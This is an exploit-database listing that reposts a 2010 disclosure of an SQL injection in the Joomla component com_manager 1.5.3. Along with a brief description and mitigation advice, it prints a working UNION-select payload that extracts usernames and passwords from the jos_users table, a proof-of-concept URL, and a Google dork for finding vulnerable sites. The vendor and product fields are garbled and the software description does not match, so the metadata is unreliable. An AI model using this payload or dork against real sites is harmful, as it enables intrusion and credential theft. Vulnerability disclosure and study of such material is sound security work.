header-logo
Suggest Exploit
vendor:
Egyption Hacker
by:
Islam DefenDers Mr.HaMaDa
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Egyption Hacker
Affected Version From: 1.5.3
Affected Version To: 1.5.3
Patch Exists: NO
Related CWE: N/A
CPE: a:mixaty:egyption_hacker:1.5.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability

A vulnerability exists in Joomla Component com_manager 1.5.3, which allows an attacker to inject arbitrary SQL commands. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code in the 'id' parameter in a 'index.php?option=com_manager&view=flight&Itemid=[SQL]' URL. This can be used to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged account with access to the database.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------
 Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : Islam DefenDers Mr.HaMaDa
Site        : http://MiXaTy.com
Date        : April, 15-2010
Location    : Egyption HackEr
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Egyption HackEr
Vendor      : http://MixaTy.com
Version     : 1.5.3 Other versions may also be affected
Google Dork : inurl:com_manager

Intellectual Property allows independent real estate agents, brokers, or property
management companies to upload and maintain property listings for sale, for rent and for lease.
Upload photos, add categories, sub-categories, agent profiles, company profiles.
Search with an advanced Google Map-Ajax-based map interface. Allow users to save and
manage favorite properties. Quickly customize colors, filters, galleries and more!
----------------------------------------------------------------

Exploitz:
~~~~~~~

-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_manager&view=flight&Itemid=[SQL]
----------------------------------------------------------------
 HaMaDa SCoOoRPioN - ViRuSMaN - DR.BaHy - Mixaty TeaM - Islam DefenDers TeaM

----------------------------------------------------------------
Contact:
~~~~

Site: www.mixaty.com

email: hackereg@hotmail.com